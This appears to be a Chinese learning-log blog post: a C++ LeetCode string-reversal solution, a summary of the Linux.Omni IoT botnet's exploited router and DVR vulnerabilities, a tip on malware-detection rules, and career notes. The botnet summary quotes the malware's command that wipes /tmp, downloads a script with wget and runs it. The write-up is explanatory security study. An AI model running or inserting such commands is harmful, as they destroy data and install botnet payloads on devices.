ARTS:

  • Algrothm: leetcode算法题目
  • Review: 阅读并且点评一篇英文技术文章
  • Tip/Techni: 学习一个技术技巧
  • Share: 分享一篇有观点和思考的技术文章

Algorithm

【leetcode】Reverse String

https://leetcode.com/problems/reverse-string/

1)problem

编写一个以字符串作为输入并逆转字符串的函数。

2)answer

字符串大于0,就从最末尾开始取值。

3)solution

#include "pch.h"
#include <stdio.h>
#include <string>
#include <iostream>
#include <algorithm>
using std::string;

class Solution {
public:
    string reverseString(string s) {

        string result = "";
        for (int i =s.length()-1;i>=0 ; i--)
        {
            result += s.at(i);
        }

        return result;

    }
};

int main()
{
    // 使用内容
    Solution nSolution;
    nSolution.reverseString("abcdef");
}

Review

【漏洞挖掘】Linux.Omni IoT 僵尸网络恶意软件分析

1)场景

Linux下针对IoT威胁的分类和分析。

2)问题难点

使用什么方式对IOT设备进行攻击。

3)解决问题的方法

Linux.Omni因其感染库包含了许多漏洞(总共11种)

4)方法细节

利用的IoT设备漏洞

  • Vacron

VACRON网络录像机中"board.cgi"参数存在代码注入的漏洞。

  • Netgear – CVE-2016-6277

通过对路由器“cgi-bin/”目录进行GET请求而进行的远程代码执行攻击。

  • D-Link – OS-Command Injection via UPnP

IoTReaper使用的是hedwig.cgi参数cookie溢出的漏洞,Omni使用的则是UPnP端口漏洞。

Omni的POST请求如下:

我们可以找到对应的二进制命令:

存在漏洞的固件版本是:
DIR-300 rev B – 2.14b01,
DIR-600 – 2.16b01,
DIR-645 – 1.04b01,
DIR-845 – 1.01b02,
DIR-865 – 1.05b03。

  • CCTV-DVR

与“/language/Swedish”资源相关联,允许远程执行代码。

  • D-Link – HNAP

通过CAPTCHA绕过登录,并允许外部攻击者执行远程代码。

D-Link路由器有此漏洞的版本:

DI-524 C1 3.23,
DIR-628 B2 1.20NA1.22NA,
DIR-655 A1 1.30EA

  • TR-069 – SOAP

漏洞利用如下:

二进制中的指令:

  • Huawei Router HG532 – Arbitrary Command Execution

在华为HG532路由器中,可以通过修改HTTP请求来利用配置文件验证错误的漏洞。

此漏洞已在分析Okiru/Satori僵尸网络的文章中(Analysis of Linux.Okiru)被检测及分析。

  • Netgear – Setup.cgi RCE

Netgear路由器DGN1000 1.1.00.48固件中存在允许远程执行代码而无需事先验证的漏洞。

  • Realtek SDK

使用Realtek SDK和miniigd守护程序的不同设备都存在通过UPnP SOAP接口的命令注入漏洞。

  • GPON

GPON路由器的最新漏洞

5)总结

尽管攻击方式多种多样, 在受感染设备上运行的命令是一致的:

cd /tmp;rm -rf *;wget http://%s/{marcaDispositivo};sh /tmp/{marcaDispositivo}

下载的文件是bash脚本,它依据受感染设备的不同构架来下载样本。

Tip

【安全开发】恶意代码检查工具1

1)场景

网络安全设备报警,某台机器中毒。

2)问题难点

如何快速找到机器里的恶意代码相关进程、文件。

3)解决思路

通过搜索国内外恶意代码公开的分析报告,分析样本,提取行为特征。

4)方法细节

逆向分析收集到的样本,然后提取规则:

文件规则:文件路径、Yara规则

注册表:注册表路径、子项、类型、值

内存:内存特征码、内存类型、内存保护属性、内存块大小范围

遍历内存代码:

【恶意代码】恶意代码代码特征提取
https://www.cnblogs.com//17bdw/p/10181207.html

5)总结

只需要搞懂两个知识点:VirtualQueryEx使用、MEMORY_BASIC_INFORMATION 结构体中RegionSize字段的含义。

Share

【业务能力】极客时间-左耳听风-开篇词1

1)场景

利用技术变现思路。

2)问题难点

在长时间加班情况下,如何保持学习。

3)解决思路

觉得还是要从头到尾看完一本书,不容易被分神。
白天工作回家就不想动了。

4)方法细节

【技术思路】极客时间-左耳听风-开篇词1
https://www.cnblogs.com/17bdw/p/10183216.html

5)总结

用技术变现:

独立思考
保持学习力、洞察力
寻找合适的环境
具备动手能力。
关注技术付费点
善于提升经验
输出价值观
朋友圈
拥有技术领导力

【ARTS】01_06_左耳听风-20181217~1223的更多相关文章

  1. 【ARTS】01_21_左耳听风-201900401~201900407

    ARTS: Algrothm: leetcode算法题目 Review: 阅读并且点评一篇英文技术文章 Tip/Techni: 学习一个技术技巧 Share: 分享一篇有观点和思考的技术文章 Algo ...

  2. 【ARTS】01_20_左耳听风-20190325~20190331

    zz## ARTS: Algrothm: leetcode算法题目 Review: 阅读并且点评一篇英文技术文章 Tip/Techni: 学习一个技术技巧 Share: 分享一篇有观点和思考的技术文章 ...

  3. 【ARTS】01_19_左耳听风-20190318~20190324

    ARTS: Algrothm: leetcode算法题目 Review: 阅读并且点评一篇英文技术文章 Tip/Techni: 学习一个技术技巧 Share: 分享一篇有观点和思考的技术文章 Algo ...

  4. 【ARTS】01_18_左耳听风-20190311~20190317

    ARTS: Algrothm: leetcode算法题目 Review: 阅读并且点评一篇英文技术文章 Tip/Techni: 学习一个技术技巧 Share: 分享一篇有观点和思考的技术文章 Algo ...

  5. 【ARTS】01_17_左耳听风-20190304~20190310

    ARTS: Algrothm: leetcode算法题目 Review: 阅读并且点评一篇英文技术文章 Tip/Techni: 学习一个技术技巧 Share: 分享一篇有观点和思考的技术文章 Algo ...

  6. 【ARTS】01_16_左耳听风-20190225~20190303

    ARTS: Algrothm: leetcode算法题目 Review: 阅读并且点评一篇英文技术文章 Tip/Techni: 学习一个技术技巧 Share: 分享一篇有观点和思考的技术文章 Algo ...

  7. 【ARTS】01_14_左耳听风-20190211~20190217

    ARTS: Algrothm: leetcode算法题目 Review: 阅读并且点评一篇英文技术文章 Tip/Techni: 学习一个技术技巧 Share: 分享一篇有观点和思考的技术文章 Algo ...

  8. 【ARTS】01_10_左耳听风-20190114~20190120

    ARTS: Algrothm: leetcode算法题目 Review: 阅读并且点评一篇英文技术文章 Tip/Techni: 学习一个技术技巧 Share: 分享一篇有观点和思考的技术文章 Algo ...

  9. 【ARTS】01_09_左耳听风-20190107~20190113

    ARTS: Algrothm: leetcode算法题目 Review: 阅读并且点评一篇英文技术文章 Tip/Techni: 学习一个技术技巧 Share: 分享一篇有观点和思考的技术文章 Algo ...

随机推荐

  1. think in UML(一)

    从一开始上课老师就讲面向对象设计面向对象设计,然而对于什么是面向对象是什么没有什么具体的概念,相较于面向对象设计,面向对象又有什么什么优势.<大象>从一开始就交代了我最基础的知识欠缺,在书 ...

  2. 第四篇——Spring音乐登录界面设计及实现(C#)

    Spring音乐播放器,我们小组设计其启动时有一个登录界面,用户初次可以注册,输入用户名和密码,点击注册即将输入信息保存到register文本文件中:如果已有用户名,输入用户名和密码,点击登录,程序会 ...

  3. 微信小程序input组件抖动及textarea组件光标错位解决方案

    问题一: 使用微信小程序input组件时,在移动端唤起focus或blur事件时,因光标占位导致内容出现叠影及抖动现象. 解决方案: 用<textarea>组件代替了<input/& ...

  4. python文本替换

    file_data = '' str1 = ' str2 = ' with open(loginfofile, 'r+') as f: #打开文件,r+模式,读取 for line in f: if ...

  5. 理解 Continuation

    理解 Continuation (2012-08-26 10:39:34)     终于,我也不能免俗地要来谈谈这几个 Schemer 的必谈话题(顺便山寨了一个标题). Scheme 是一门神奇的编 ...

  6. 导致 KEIL error #20 的一种情况

    > 描述 <+> 环境为 KEIL5.20 & STM32F429工程,平台为 win10 <+> 结构体原形如下 @File <A.h> #incl ...

  7. 洛谷 P2051 [AHOI2009]中国象棋 解题报告

    P2051 [AHOI2009]中国象棋 题目描述 这次小可可想解决的难题和中国象棋有关,在一个N行M列的棋盘上,让你放若干个炮(可以是0个),使得没有一个炮可以攻击到另一个炮,请问有多少种放置方法. ...

  8. php编程——验证码的实现(session方法)

    index.PHP(实现输入验证码页面)代码如下: <html><head><title>check code</title></head> ...

  9. div+css感悟

    div+css感觉很简单,可是真正做起来一些小细节把握不好,这个网页的布局也是完成不了的.今天学习了一些技巧方法现在分享下: 即一个原则,网页由一个个的大盒子组成,一个个的大盒子里面装着一个个的小盒子 ...

  10. linux driver ------ 三星公司uboot模式下更改分区(EMMC)大小fdisk命令 ------ iTOP4412 开发板烧写

    核心板 SCP 1G eMMC:KLM8G------>8G 终端(串口)输入(如果执行过,只需要执行最后一句即可): 开发板一启动,立马在终端按回车,进入 uboot 模式 fdisk -c ...